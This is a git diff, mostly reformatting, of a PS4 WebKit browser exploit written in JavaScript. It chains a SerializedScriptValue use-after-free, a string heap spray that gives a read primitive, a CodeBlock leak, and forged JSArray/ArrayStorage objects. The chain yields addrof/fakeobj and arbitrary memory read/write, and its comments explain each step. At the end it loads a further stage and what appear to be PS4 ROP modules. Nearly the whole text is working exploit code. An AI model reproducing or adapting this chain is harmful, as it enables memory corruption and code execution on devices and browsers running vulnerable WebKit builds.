- res[0] = new BufferView(view.buffer);
- i = num_reuses - 1;
- }
- }
-
- if (res.length !== 2) {
- die('failed SerializedScriptValue UAF');
- }
- return res;
+ if (res.length !== 2) {
+ die("failed SerializedScriptValue UAF");
+ }
+ return res;
}
class Reader {
- constructor(rstr, rstr_view) {
- this.rstr = rstr;
- this.rstr_view = rstr_view;
- this.m_data = rstr_view.read64(off.strimpl_m_data);
- }
+ constructor(rstr, rstr_view) {
+ this.rstr = rstr;
+ this.rstr_view = rstr_view;
+ this.m_data = rstr_view.read64(off.strimpl_m_data);
+ }
- read8_at(offset) {
- return this.rstr.charCodeAt(offset);
- }
+ read8_at(offset) {
+ return this.rstr.charCodeAt(offset);
+ }
- read32_at(offset) {
- const str = this.rstr;
- return (
- str.charCodeAt(offset)
- | str.charCodeAt(offset + 1) << 8
- | str.charCodeAt(offset + 2) << 16
- | str.charCodeAt(offset + 3) << 24
- ) >>> 0;
- }
+ read32_at(offset) {
+ const str = this.rstr;
+ return (str.charCodeAt(offset) | (str.charCodeAt(offset + 1) << 8) | (str.charCodeAt(offset + 2) << 16) | (str.charCodeAt(offset + 3) << 24)) >>> 0;
+ }
- read64_at(offset) {
- return sread64(this.rstr, offset);
- }
+ read64_at(offset) {
+ return sread64(this.rstr, offset);
+ }
- read64(addr) {
- this.rstr_view.write64(off.strimpl_m_data, addr);
- return sread64(this.rstr, 0);
- }
+ read64(addr) {
+ this.rstr_view.write64(off.strimpl_m_data, addr);
+ return sread64(this.rstr, 0);
+ }
- set_addr(addr) {
- this.rstr_view.write64(off.strimpl_m_data, addr);
- }
+ set_addr(addr) {
+ this.rstr_view.write64(off.strimpl_m_data, addr);
+ }
- // remember to use this to fix up the StringImpl before freeing it
- restore() {
- this.rstr_view.write64(off.strimpl_m_data, this.m_data);
- this.rstr_view.write32(off.strimpl_strlen, original_strlen);
- }
+ // remember to use this to fix up the StringImpl before freeing it
+ restore() {
+ this.rstr_view.write64(off.strimpl_m_data, this.m_data);
+ this.rstr_view.write32(off.strimpl_strlen, original_strlen);
+ }
}
// we now have a double free on the fastMalloc heap
async function make_rdr(view) {
- let str_wait = 0;
- const strs = [];
- const u32 = new Uint32Array(1);
- const u8 = new Uint8Array(u32.buffer);
- const marker_offset = original_strlen - 4;
- const pad = 'B'.repeat(marker_offset);
+ let str_wait = 0;
+ const strs = [];
+ const u32 = new Uint32Array(1);
+ const u8 = new Uint8Array(u32.buffer);
+ const marker_offset = original_strlen - 4;
+ const pad = "B".repeat(marker_offset);
- log('start string spray');
- while (true) {
- for (let i = 0; i < num_strs; i++) {
- u32[0] = i;
- // on versions like 8.0x:
- // * String.fromCharCode() won't create a 8-bit string. so we use
- // fromCodePoint() instead
- // * Array.prototype.join() won't try to convert 16-bit strings to
- // 8-bit
- //
- // given the restrictions above, we will ensure "str" is always a
- // 8-bit string. you can check a WebKit source code (e.g. on 8.0x)
- // to see that String.prototype.repeat() will create a 8-bit string
- // if the repeated string's length is 1
- //
- // Array.prototype.join() calls JSC::JSStringJoiner::join(). it
- // returns a plain JSString (not a JSRopeString). that means we
- // have allocated a WTF::StringImpl with the proper size and whose
- // string data is inlined
- const str = [pad, String.fromCodePoint(...u8)].join('');
- strs.push(str);
- }
-
- if (view.read32(off.strimpl_inline_str) === 0x42424242) {
- view.write32(off.strimpl_strlen, 0xffffffff);
- break;
- }
-
- strs.length = 0;
- gc();
- await sleep();
- str_wait++;
+ log("start string spray");
+ while (true) {
+ for (let i = 0; i < num_strs; i++) {
+ u32[0] = i;
+ // on versions like 8.0x:
+ // * String.fromCharCode() won't create a 8-bit string. so we use
+ // fromCodePoint() instead
+ // * Array.prototype.join() won't try to convert 16-bit strings to
+ // 8-bit
+ //
+ // given the restrictions above, we will ensure "str" is always a
+ // 8-bit string. you can check a WebKit source code (e.g. on 8.0x)
+ // to see that String.prototype.repeat() will create a 8-bit string
+ // if the repeated string's length is 1
+ //
+ // Array.prototype.join() calls JSC::JSStringJoiner::join(). it
+ // returns a plain JSString (not a JSRopeString). that means we
+ // have allocated a WTF::StringImpl with the proper size and whose
+ // string data is inlined
+ const str = [pad, String.fromCodePoint(...u8)].join("");
+ strs.push(str);
}
- log(`JSString reused memory at loop: ${str_wait}`);
- const idx = view.read32(off.strimpl_inline_str + marker_offset);
- log(`str index: ${hex(idx)}`);
- log('view:');
- log(view);
-
- // versions like 8.0x have a JSC::JSString that have their own m_length
- // field. strings consult that field instead of the m_length of their
- // StringImpl
- //
- // we work around this by passing the string to Error.
- // ErrorInstance::create() will then create a new JSString initialized from
- // the StringImpl of the message argument
- const rstr = Error(strs[idx]).message;
- log(`str len: ${hex(rstr.length)}`);
- if (rstr.length === 0xffffffff) {
- log('confirmed correct leaked');
- const addr = (
- view.read64(off.strimpl_m_data)
- .sub(off.strimpl_inline_str)
- );
- log(`view's buffer address: ${addr}`);
- return new Reader(rstr, view);
+ if (view.read32(off.strimpl_inline_str) === 0x42424242) {
+ view.write32(off.strimpl_strlen, 0xffffffff);
+ break;
}
- die('JSString wasn\'t modified');
+
+ strs.length = 0;
+ gc();
+ await sleep();
+ str_wait++;
+ }
+ log(`JSString reused memory at loop: ${str_wait}`);
+
+ const idx = view.read32(off.strimpl_inline_str + marker_offset);
+ log(`str index: ${hex(idx)}`);
+ log("view:");
+ log(view);
+
+ // versions like 8.0x have a JSC::JSString that have their own m_length
+ // field. strings consult that field instead of the m_length of their
+ // StringImpl
+ //
+ // we work around this by passing the string to Error.
+ // ErrorInstance::create() will then create a new JSString initialized from
+ // the StringImpl of the message argument
+ const rstr = Error(strs[idx]).message;
+ log(`str len: ${hex(rstr.length)}`);
+ if (rstr.length === 0xffffffff) {
+ log("confirmed correct leaked");
+ const addr = view.read64(off.strimpl_m_data).sub(off.strimpl_inline_str);
+ log(`view's buffer address: ${addr}`);
+ return new Reader(rstr, view);
+ }
+ die("JSString wasn't modified");
}
// we will create a JSC::CodeBlock whose m_constantRegisters is set to an array
// of JSValues whose size is ssv_len. the undefined constant is automatically
// added due to reasons such as "undefined is returned by default if the
// function exits without returning anything"
-const cons_len = ssv_len - 8*5;
+const cons_len = ssv_len - 8 * 5;
const bt_offset = 0;
-const idx_offset = ssv_len - 8*3;
-const strs_offset = ssv_len - 8*2;
+const idx_offset = ssv_len - 8 * 3;
+const strs_offset = ssv_len - 8 * 2;
const src_part = (() => {
- // we user var instead of let/const since such variables always get
- // initialized to the NULL JSValue even if you immediately return. we will
- // make functions that do as little as possible in order to speed up the
- // exploit. m_constantRegisters will still contain the unused constants
- //
- // function foo() {
- // return;
- // let a = 1;
- // }
- //
- // the resulting bytecode:
- // bb#1
- // [ 0] enter
- // [ 1] get_scope loc4
- // [ 3] mov loc5, loc4
- // [ 6] check_traps
- // // this part still initializes a with the NULL JSValue
- // [ 7] mov loc6, (const0)
- // [ 10] ret Undefined(const1)
- // Successors: [ ]
- //
- // bb#2
- // [ 12] mov loc6, Int32: 1(const2)
- // [ 15] ret Undefined(const1)
- // Successors: [ ]
- //
- //
- // Constants:
- // k0 =
- // k1 = Undefined
- // k2 = Int32: 1: in source as integer
- let res = 'var f = 0x11223344;\n';
- // make unique constants that won't collide with the possible marker values
- for (let i = 0; i < cons_len; i += 8) {
- res += `var a${i} = ${num_leaks + i};\n`;
- }
- return res;
+ // we user var instead of let/const since such variables always get
+ // initialized to the NULL JSValue even if you immediately return. we will
+ // make functions that do as little as possible in order to speed up the
+ // exploit. m_constantRegisters will still contain the unused constants
+ //
+ // function foo() {
+ // return;
+ // let a = 1;
+ // }
+ //
+ // the resulting bytecode:
+ // bb#1
+ // [ 0] enter
+ // [ 1] get_scope loc4
+ // [ 3] mov loc5, loc4
+ // [ 6] check_traps
+ // // this part still initializes a with the NULL JSValue
+ // [ 7] mov loc6, (const0)
+ // [ 10] ret Undefined(const1)
+ // Successors: [ ]
+ //
+ // bb#2
+ // [ 12] mov loc6, Int32: 1(const2)
+ // [ 15] ret Undefined(const1)
+ // Successors: [ ]
+ //
+ //
+ // Constants:
+ // k0 =
+ // k1 = Undefined
+ // k2 = Int32: 1: in source as integer
+ let res = "var f = 0x11223344;\n";
+ // make unique constants that won't collide with the possible marker values
+ for (let i = 0; i < cons_len; i += 8) {
+ res += `var a${i} = ${num_leaks + i};\n`;
+ }
+ return res;
})();
async function leak_code_block(reader, bt_size) {
- const rdr = reader;
- const bt = [];
- // take into account the cell and indexing header of the immutable
- // butterfly
- for (let i = 0; i < bt_size - 0x10; i += 8) {
- bt.push(i);
- }
+ const rdr = reader;
+ const bt = [];
+ // take into account the cell and indexing header of the immutable
+ // butterfly
+ for (let i = 0; i < bt_size - 0x10; i += 8) {
+ bt.push(i);
+ }
- // cache the global variable resolution
- const slen = ssv_len;
+ // cache the global variable resolution
+ const slen = ssv_len;
- const bt_part = `var bt = [${bt}];\nreturn bt;\n`;
- const part = bt_part + src_part;
- const cache = [];
+ const bt_part = `var bt = [${bt}];\nreturn bt;\n`;
+ const part = bt_part + src_part;
+ const cache = [];
+ for (let i = 0; i < num_leaks; i++) {
+ cache.push(part + `var idx = ${i};\nidx\`foo\`;`);
+ }
+
+ const chunkSize = is_ps4 && version < 0x900 ? 128 * KB : 1 * MB;
+ const smallPageSize = 4 * KB;
+ const search_addr = align(rdr.m_data, chunkSize);
+ log(`search addr: ${search_addr}`);
+
+ log(`func_src:\n${cache[0]}\nfunc_src end`);
+ log("start find CodeBlock");
+ let winning_off = null;
+ let winning_idx = null;
+ let winning_f = null;
+ let find_cb_loop = 0;
+ // false positives
+ let fp = 0;
+ rdr.set_addr(search_addr);
+ loop: while (true) {
+ const funcs = [];
for (let i = 0; i < num_leaks; i++) {
- cache.push(part + `var idx = ${i};\nidx\`foo\`;`);
+ const f = Function(cache[i]);
+ // the first call allocates the CodeBlock
+ f();
+ funcs.push(f);
}
- const chunkSize = (is_ps4 && version < 0x900) ? 128 * KB : 1 * MB;
- const smallPageSize = 4 * KB;
- const search_addr = align(rdr.m_data, chunkSize);
- log(`search addr: ${search_addr}`);
-
- log(`func_src:\n${cache[0]}\nfunc_src end`);
- log('start find CodeBlock');
- let winning_off = null;
- let winning_idx = null;
- let winning_f = null;
- let find_cb_loop = 0;
- // false positives
- let fp = 0;
- rdr.set_addr(search_addr);
- loop: while (true) {
- const funcs = [];
- for (let i = 0; i < num_leaks; i++) {
- const f = Function(cache[i]);
- // the first call allocates the CodeBlock
- f();
- funcs.push(f);
+ for (let p = 0; p < chunkSize; p += smallPageSize) {
+ for (let i = p; i < p + smallPageSize; i += slen) {
+ if (rdr.read32_at(i + 8) !== 0x11223344) {
+ continue;
}
- for (let p = 0; p < chunkSize; p += smallPageSize) {
- for (let i = p; i < p + smallPageSize; i += slen) {
- if (rdr.read32_at(i + 8) !== 0x11223344) {
- continue;
- }
-
- rdr.set_addr(rdr.read64_at(i + strs_offset));
- const m_type = rdr.read8_at(5);
- // make sure we're not reading the constant registers of an
- // UnlinkedCodeBlock. those have JSTemplateObjectDescriptors.
- // CodeBlock converts those to JSArrays
- if (m_type !== 0) {
- rdr.set_addr(search_addr);
- winning_off = i;
- winning_idx = rdr.read32_at(i + idx_offset);
- winning_f = funcs[winning_idx];
- break loop;
- }
- rdr.set_addr(search_addr);
- fp++;
- }
+ rdr.set_addr(rdr.read64_at(i + strs_offset));
+ const m_type = rdr.read8_at(5);
+ // make sure we're not reading the constant registers of an
+ // UnlinkedCodeBlock. those have JSTemplateObjectDescriptors.
+ // CodeBlock converts those to JSArrays
+ if (m_type !== 0) {
+ rdr.set_addr(search_addr);
+ winning_off = i;
+ winning_idx = rdr.read32_at(i + idx_offset);
+ winning_f = funcs[winning_idx];
+ break loop;
}
-
- find_cb_loop++;
- gc();
- await sleep();
- }
- log(`loop ${find_cb_loop} winning_off: ${hex(winning_off)}`);
- log(`winning_idx: ${hex(winning_idx)} false positives: ${fp}`);
-
- log('CodeBlock.m_constantRegisters.m_buffer:');
- rdr.set_addr(search_addr.add(winning_off));
- for (let i = 0; i < slen; i += 8) {
- log(`${rdr.read64_at(i)} | ${hex(i)}`);
+ rdr.set_addr(search_addr);
+ fp++;
+ }
}
- const bt_addr = rdr.read64_at(bt_offset);
- const strs_addr = rdr.read64_at(strs_offset);
- log(`immutable butterfly addr: ${bt_addr}`);
- log(`string array passed to tag addr: ${strs_addr}`);
+ find_cb_loop++;
+ gc();
+ await sleep();
+ }
+ log(`loop ${find_cb_loop} winning_off: ${hex(winning_off)}`);
+ log(`winning_idx: ${hex(winning_idx)} false positives: ${fp}`);
- log('JSImmutableButterfly:');
- rdr.set_addr(bt_addr);
- for (let i = 0; i < bt_size; i += 8) {
- log(`${rdr.read64_at(i)} | ${hex(i)}`);
- }
+ log("CodeBlock.m_constantRegisters.m_buffer:");
+ rdr.set_addr(search_addr.add(winning_off));
+ for (let i = 0; i < slen; i += 8) {
+ log(`${rdr.read64_at(i)} | ${hex(i)}`);
+ }
- log('string array:');
- rdr.set_addr(strs_addr);
- for (let i = 0; i < off.size_jsobj; i += 8) {
- log(`${rdr.read64_at(i)} | ${hex(i)}`);
- }
+ const bt_addr = rdr.read64_at(bt_offset);
+ const strs_addr = rdr.read64_at(strs_offset);
+ log(`immutable butterfly addr: ${bt_addr}`);
+ log(`string array passed to tag addr: ${strs_addr}`);
- return [winning_f, bt_addr, strs_addr];
+ log("JSImmutableButterfly:");
+ rdr.set_addr(bt_addr);
+ for (let i = 0; i < bt_size; i += 8) {
+ log(`${rdr.read64_at(i)} | ${hex(i)}`);
+ }
+
+ log("string array:");
+ rdr.set_addr(strs_addr);
+ for (let i = 0; i < off.size_jsobj; i += 8) {
+ log(`${rdr.read64_at(i)} | ${hex(i)}`);
+ }
+
+ return [winning_f, bt_addr, strs_addr];
}
// data to write to the SerializedScriptValue
@@ -612,254 +586,250 @@ async function leak_code_block(reader, bt_size) {
// setup to make deserialization create an ArrayBuffer with an arbitrary buffer
// address
function make_ssv_data(ssv_buf, view, view_p, addr, size) {
- // sizeof JSC::ArrayBufferContents
- const size_abc = (() => {
- if (is_ps4) {
- return version >= 0x900 ? 0x18 : 0x20;
- } else {
- return version >= 0x300 ? 0x18 : 0x20;
- }
- })();
-
- const data_len = 9;
- // sizeof WTF::Vector
- const size_vector = 0x10;
-
- // SSV offsets
- const off_m_data = 8;
- const off_m_abc = 0x18;
- // view offsets
- const voff_vec_abc = 0; // Vector
- const voff_abc = voff_vec_abc + size_vector; // ArrayBufferContents
- const voff_data = voff_abc + size_abc;
-
- // WTF::Vector
- // write m_data
- // m_buffer
- ssv_buf.write64(off_m_data, view_p.add(voff_data));
- // m_capacity
- ssv_buf.write32(off_m_data + 8, data_len);
- // m_size
- ssv_buf.write64(off_m_data + 0xc, data_len);
-
- // 6 is the serialization format version number for ps4 6.00. The format
- // is backwards compatible and using a value less than the current version
- // number used by a specific WebKit version is considered valid.
- //
- // See CloneDeserializer::isValid() from
- // WebKit/Source/WebCore/bindings/js/SerializedScriptValue.cpp at PS4 8.0x.
- const CurrentVersion = 6;
- const ArrayBufferTransferTag = 23;
- view.write32(voff_data, CurrentVersion);
- view[voff_data + 4] = ArrayBufferTransferTag;
- view.write32(voff_data + 5, 0);
-
- // std::unique_ptr>
- // write m_arrayBufferContentsArray
- ssv_buf.write64(off_m_abc, view_p.add(voff_vec_abc));
- // write WTF::Vector
- view.write64(voff_vec_abc, view_p.add(voff_abc));
- view.write32(voff_vec_abc + 8, 1);
- view.write32(voff_vec_abc + 0xc, 1);
-
- if (size_abc === 0x20) {
- // m_destructor, offset 0, leave as 0
- // m_shared, offset 8, leave as 0
- // m_data
- view.write64(voff_abc + 0x10, addr);
- // m_sizeInBytes
- view.write32(voff_abc + 0x18, size);
+ // sizeof JSC::ArrayBufferContents
+ const size_abc = (() => {
+ if (is_ps4) {
+ return version >= 0x900 ? 0x18 : 0x20;
} else {
- // m_data
- view.write64(voff_abc + 0, addr);
- // m_destructor (48 bits), offset 8, leave as 0
- // m_shared (48 bits), offset 0xe, leave as 0
- // m_sizeInBytes
- view.write32(voff_abc + 0x14, size);
+ return version >= 0x300 ? 0x18 : 0x20;
}
+ })();
+
+ const data_len = 9;
+ // sizeof WTF::Vector
+ const size_vector = 0x10;
+
+ // SSV offsets
+ const off_m_data = 8;
+ const off_m_abc = 0x18;
+ // view offsets
+ const voff_vec_abc = 0; // Vector
+ const voff_abc = voff_vec_abc + size_vector; // ArrayBufferContents
+ const voff_data = voff_abc + size_abc;
+
+ // WTF::Vector
+ // write m_data
+ // m_buffer
+ ssv_buf.write64(off_m_data, view_p.add(voff_data));
+ // m_capacity
+ ssv_buf.write32(off_m_data + 8, data_len);
+ // m_size
+ ssv_buf.write64(off_m_data + 0xc, data_len);
+
+ // 6 is the serialization format version number for ps4 6.00. The format
+ // is backwards compatible and using a value less than the current version
+ // number used by a specific WebKit version is considered valid.
+ //
+ // See CloneDeserializer::isValid() from
+ // WebKit/Source/WebCore/bindings/js/SerializedScriptValue.cpp at PS4 8.0x.
+ const CurrentVersion = 6;
+ const ArrayBufferTransferTag = 23;
+ view.write32(voff_data, CurrentVersion);
+ view[voff_data + 4] = ArrayBufferTransferTag;
+ view.write32(voff_data + 5, 0);
+
+ // std::unique_ptr>
+ // write m_arrayBufferContentsArray
+ ssv_buf.write64(off_m_abc, view_p.add(voff_vec_abc));
+ // write WTF::Vector
+ view.write64(voff_vec_abc, view_p.add(voff_abc));
+ view.write32(voff_vec_abc + 8, 1);
+ view.write32(voff_vec_abc + 0xc, 1);
+
+ if (size_abc === 0x20) {
+ // m_destructor, offset 0, leave as 0
+ // m_shared, offset 8, leave as 0
+ // m_data
+ view.write64(voff_abc + 0x10, addr);
+ // m_sizeInBytes
+ view.write32(voff_abc + 0x18, size);
+ } else {
+ // m_data
+ view.write64(voff_abc + 0, addr);
+ // m_destructor (48 bits), offset 8, leave as 0
+ // m_shared (48 bits), offset 0xe, leave as 0
+ // m_sizeInBytes
+ view.write32(voff_abc + 0x14, size);
+ }
}
async function make_arw(reader, view2, pop) {
- const rdr = reader;
+ const rdr = reader;
- // we have to align the fake object to atomSize (16) else the process
- // crashes. we don't know why
- //
- // since cells (GC memory chunks) are always aligned to atomSize, there
- // might be code that's assuming that all GC pointers are aligned
- //
- // see atomSize from WebKit/Source/JavaScriptCore/heap/MarkedBlock.h at
- // PS4 8.0x
- const fakeobj_off = 0x20;
- const fakebt_base = fakeobj_off + off.size_jsobj;
- // sizeof JSC::IndexingHeader
- const indexingHeader_size = 8;
- // sizeof JSC::ArrayStorage
- const arrayStorage_size = 0x18;
- // there's only the .raw property
- const propertyStorage = 8;
- const fakebt_off = fakebt_base + indexingHeader_size + propertyStorage;
+ // we have to align the fake object to atomSize (16) else the process
+ // crashes. we don't know why
+ //
+ // since cells (GC memory chunks) are always aligned to atomSize, there
+ // might be code that's assuming that all GC pointers are aligned
+ //
+ // see atomSize from WebKit/Source/JavaScriptCore/heap/MarkedBlock.h at
+ // PS4 8.0x
+ const fakeobj_off = 0x20;
+ const fakebt_base = fakeobj_off + off.size_jsobj;
+ // sizeof JSC::IndexingHeader
+ const indexingHeader_size = 8;
+ // sizeof JSC::ArrayStorage
+ const arrayStorage_size = 0x18;
+ // there's only the .raw property
+ const propertyStorage = 8;
+ const fakebt_off = fakebt_base + indexingHeader_size + propertyStorage;
- log('STAGE: leak CodeBlock');
- // has too be greater than 0x10. the size of JSImmutableButterfly
- const bt_size = 0x10 + fakebt_off + arrayStorage_size;
- const [func, bt_addr, strs_addr] = await leak_code_block(rdr, bt_size);
+ log("STAGE: leak CodeBlock");
+ // has too be greater than 0x10. the size of JSImmutableButterfly
+ const bt_size = 0x10 + fakebt_off + arrayStorage_size;
+ const [func, bt_addr, strs_addr] = await leak_code_block(rdr, bt_size);
- const view = rdr.rstr_view;
- const view_p = rdr.m_data.sub(off.strimpl_inline_str);
- const view_save = new Uint8Array(view);
+ const view = rdr.rstr_view;
+ const view_p = rdr.m_data.sub(off.strimpl_inline_str);
+ const view_save = new Uint8Array(view);
- view.fill(0);
- make_ssv_data(view2, view, view_p, bt_addr, bt_size);
+ view.fill(0);
+ make_ssv_data(view2, view, view_p, bt_addr, bt_size);
- const bt = new BufferView(pop.state);
- view.set(view_save);
+ const bt = new BufferView(pop.state);
+ view.set(view_save);
- log('ArrayBuffer pointing to JSImmutableButterfly:');
- for (let i = 0; i < bt.byteLength; i += 8) {
- log(`${bt.read64(i)} | ${hex(i)}`);
- }
+ log("ArrayBuffer pointing to JSImmutableButterfly:");
+ for (let i = 0; i < bt.byteLength; i += 8) {
+ log(`${bt.read64(i)} | ${hex(i)}`);
+ }
- // the immutable butterfly's indexing type is ArrayWithInt32 so
- // JSImmutableButterfly::visitChildren() won't ask the GC to scan its slots
- // for JSObjects to recursively visit. this means that we can write
- // anything to the the butterfly's data area without fear of a GC crash
+ // the immutable butterfly's indexing type is ArrayWithInt32 so
+ // JSImmutableButterfly::visitChildren() won't ask the GC to scan its slots
+ // for JSObjects to recursively visit. this means that we can write
+ // anything to the the butterfly's data area without fear of a GC crash
- const val_true = 7; // JSValue of "true"
- const strs_cell = rdr.read64(strs_addr);
+ const val_true = 7; // JSValue of "true"
+ const strs_cell = rdr.read64(strs_addr);
- bt.write64(fakeobj_off, strs_cell);
- bt.write64(fakeobj_off + off.js_butterfly, bt_addr.add(fakebt_off));
+ bt.write64(fakeobj_off, strs_cell);
+ bt.write64(fakeobj_off + off.js_butterfly, bt_addr.add(fakebt_off));
- // since .raw is the first ever created property, it's just besides the
- // indexing header
- bt.write64(fakebt_off - 0x10, val_true);
- // indexing header's publicLength and vectorLength
- bt.write32(fakebt_off - 8, 1);
- bt.write32(fakebt_off - 8 + 4, 1);
+ // since .raw is the first ever created property, it's just besides the
+ // indexing header
+ bt.write64(fakebt_off - 0x10, val_true);
+ // indexing header's publicLength and vectorLength
+ bt.write32(fakebt_off - 8, 1);
+ bt.write32(fakebt_off - 8 + 4, 1);
- // custom ArrayStorage that allows read/write to index 0. we have to use an
- // ArrayStorage because the structure assigned to the structure ID expects
- // one so visitButterfly() will crash if we try to fake the object with a
- // regular butterfly
+ // custom ArrayStorage that allows read/write to index 0. we have to use an
+ // ArrayStorage because the structure assigned to the structure ID expects
+ // one so visitButterfly() will crash if we try to fake the object with a
+ // regular butterfly
- // m_sparseMap
- bt.write64(fakebt_off, 0);
- // m_indexBias
- bt.write32(fakebt_off + 8, 0);
- // m_numValuesInVector
- bt.write32(fakebt_off + 0xc, 1);
+ // m_sparseMap
+ bt.write64(fakebt_off, 0);
+ // m_indexBias
+ bt.write32(fakebt_off + 8, 0);
+ // m_numValuesInVector
+ bt.write32(fakebt_off + 0xc, 1);
- // m_vector[0]
- bt.write64(fakebt_off + 0x10, val_true);
+ // m_vector[0]
+ bt.write64(fakebt_off + 0x10, val_true);
- // immutable_butterfly[0] = fakeobj;
- bt.write64(0x10, bt_addr.add(fakeobj_off));
+ // immutable_butterfly[0] = fakeobj;
+ bt.write64(0x10, bt_addr.add(fakeobj_off));
- const fake = func()[0];
- log(`fake.raw: ${fake.raw}`);
- log(`fake[0]: ${fake[0]}`);
- log(`fake: [${fake}]`);
+ const fake = func()[0];
+ log(`fake.raw: ${fake.raw}`);
+ log(`fake[0]: ${fake[0]}`);
+ log(`fake: [${fake}]`);
- const test_val = 3;
- log(`test setting fake[0] to ${test_val}`);
- fake[0] = test_val;
- if (fake[0] !== test_val) {
- die(`unexpected fake[0]: ${fake[0]}`);
- }
+ const test_val = 3;
+ log(`test setting fake[0] to ${test_val}`);
+ fake[0] = test_val;
+ if (fake[0] !== test_val) {
+ die(`unexpected fake[0]: ${fake[0]}`);
+ }
- function addrof(obj) {
- fake[0] = obj;
- return bt.read64(fakebt_off + 0x10);
- }
+ function addrof(obj) {
+ fake[0] = obj;
+ return bt.read64(fakebt_off + 0x10);
+ }
- // m_mode = WastefulTypedArray, allocated buffer on the fastMalloc heap,
- // unlike FastTypedArray, where the buffer is managed by the GC. This
- // prevents random crashes.
- //
- // See JSGenericTypedArrayView::visitChildren() from
- // WebKit/Source/JavaScriptCore/runtime/JSGenericTypedArrayViewInlines.h at
- // PS4 8.0x.
- const worker = new DataView(new ArrayBuffer(1));
- const main_template = new Uint32Array(new ArrayBuffer(off.size_view));
+ // m_mode = WastefulTypedArray, allocated buffer on the fastMalloc heap,
+ // unlike FastTypedArray, where the buffer is managed by the GC. This
+ // prevents random crashes.
+ //
+ // See JSGenericTypedArrayView::visitChildren() from
+ // WebKit/Source/JavaScriptCore/runtime/JSGenericTypedArrayViewInlines.h at
+ // PS4 8.0x.
+ const worker = new DataView(new ArrayBuffer(1));
+ const main_template = new Uint32Array(new ArrayBuffer(off.size_view));
- const leaker = {addr: null, 0: 0};
+ const leaker = { addr: null, 0: 0 };
- const worker_p = addrof(worker);
- const main_p = addrof(main_template);
- const leaker_p = addrof(leaker);
+ const worker_p = addrof(worker);
+ const main_p = addrof(main_template);
+ const leaker_p = addrof(leaker);
- // we'll fake objects using a JSArrayBufferView whose m_mode is
- // FastTypedArray. it's safe to use its buffer since it's GC-allocated. the
- // current fastSizeLimit is 1000. if the length is less than or equal to
- // that, we get a FastTypedArray
- const scaled_sview = off.size_view / 4;
- const faker = new Uint32Array(scaled_sview);
- const faker_p = addrof(faker);
- const faker_vector = rdr.read64(faker_p.add(off.view_m_vector));
+ // we'll fake objects using a JSArrayBufferView whose m_mode is
+ // FastTypedArray. it's safe to use its buffer since it's GC-allocated. the
+ // current fastSizeLimit is 1000. if the length is less than or equal to
+ // that, we get a FastTypedArray
+ const scaled_sview = off.size_view / 4;
+ const faker = new Uint32Array(scaled_sview);
+ const faker_p = addrof(faker);
+ const faker_vector = rdr.read64(faker_p.add(off.view_m_vector));
- const vector_idx = off.view_m_vector / 4;
- const length_idx = off.view_m_length / 4;
- const mode_idx = off.view_m_mode / 4;
- const bt_idx = off.js_butterfly / 4;
+ const vector_idx = off.view_m_vector / 4;
+ const length_idx = off.view_m_length / 4;
+ const mode_idx = off.view_m_mode / 4;
+ const bt_idx = off.js_butterfly / 4;
- // fake a Uint32Array using GC memory
- faker[vector_idx] = worker_p.lo;
- faker[vector_idx + 1] = worker_p.hi;
- faker[length_idx] = scaled_sview;
+ // fake a Uint32Array using GC memory
+ faker[vector_idx] = worker_p.lo;
+ faker[vector_idx + 1] = worker_p.hi;
+ faker[length_idx] = scaled_sview;
- rdr.set_addr(main_p);
- faker[mode_idx] = rdr.read32_at(off.view_m_mode);
- // JSCell
- faker[0] = rdr.read32_at(0);
- faker[1] = rdr.read32_at(4);
- faker[bt_idx] = rdr.read32_at(off.js_butterfly);
- faker[bt_idx + 1] = rdr.read32_at(off.js_butterfly + 4);
+ rdr.set_addr(main_p);
+ faker[mode_idx] = rdr.read32_at(off.view_m_mode);
+ // JSCell
+ faker[0] = rdr.read32_at(0);
+ faker[1] = rdr.read32_at(4);
+ faker[bt_idx] = rdr.read32_at(off.js_butterfly);
+ faker[bt_idx + 1] = rdr.read32_at(off.js_butterfly + 4);
- // fakeobj()
- bt.write64(fakebt_off + 0x10, faker_vector);
- const main = fake[0];
+ // fakeobj()
+ bt.write64(fakebt_off + 0x10, faker_vector);
+ const main = fake[0];
- log('main (pointing to worker):');
- for (let i = 0; i < off.size_view; i += 8) {
- const idx = i / 4;
- log(`${new Int(main[idx], main[idx + 1])} | ${hex(i)}`);
- }
+ log("main (pointing to worker):");
+ for (let i = 0; i < off.size_view; i += 8) {
+ const idx = i / 4;
+ log(`${new Int(main[idx], main[idx + 1])} | ${hex(i)}`);
+ }
- new Memory(
- main, worker, leaker,
- leaker_p.add(off.js_inline_prop),
- rdr.read64(leaker_p.add(off.js_butterfly)),
- );
- log('achieved arbitrary r/w');
+ new Memory(main, worker, leaker, leaker_p.add(off.js_inline_prop), rdr.read64(leaker_p.add(off.js_butterfly)));
+ log("achieved arbitrary r/w");
- rdr.restore();
- // set the refcount to a high value so we don't free the memory, view's
- // death will already free it (a StringImpl is currently using the memory)
- view.write32(0, -1);
- // ditto (a SerializedScriptValue is currently using the memory)
- view2.write32(0, -1);
- // we don't want its death to call fastFree() on GC memory
- make_arw._buffer = bt.buffer;
+ rdr.restore();
+ // set the refcount to a high value so we don't free the memory, view's
+ // death will already free it (a StringImpl is currently using the memory)
+ view.write32(0, -1);
+ // ditto (a SerializedScriptValue is currently using the memory)
+ view2.write32(0, -1);
+ // we don't want its death to call fastFree() on GC memory
+ make_arw._buffer = bt.buffer;
}
async function main() {
- log('STAGE: UAF SSV');
- const [fsets, indices] = prepare_uaf();
- const [view, [view2, pop]] = await uaf_ssv(fsets, indices[1], indices[0]);
+ log("STAGE: UAF SSV");
+ const [fsets, indices] = prepare_uaf();
+ const [view, [view2, pop]] = await uaf_ssv(fsets, indices[1], indices[0]);
- log('STAGE: get string relative read primitive');
- const rdr = await make_rdr(view);
+ log("STAGE: get string relative read primitive");
+ const rdr = await make_rdr(view);
- for (const fset of fsets) {
- fset.rows = '';
- fset.cols = '';
- }
+ for (const fset of fsets) {
+ fset.rows = "";
+ fset.cols = "";
+ }
- log('STAGE: achieve arbitrary read/write primitive');
- await make_arw(rdr, view2, pop);
+ log("STAGE: achieve arbitrary read/write primitive");
+ await make_arw(rdr, view2, pop);
- clear_log();
- import('./lapse.mjs');
+ clear_log();
+ import("./lapse.mjs");
}
main();
diff --git a/src/rop/ps4/800.mjs b/src/rop/ps4/800.mjs
index 6f408e6..42c95e9 100644
--- a/src/rop/ps4/800.mjs
+++ b/src/rop/ps4/800.mjs
@@ -17,18 +17,14 @@ along with this program. If not, see . */
// 8.00, 8.01, 8.03
-import { mem } from '../../module/mem.mjs';
-import { KB } from '../../module/offset.mjs';
-import { ChainBase, get_gadget } from '../../module/chain.mjs';
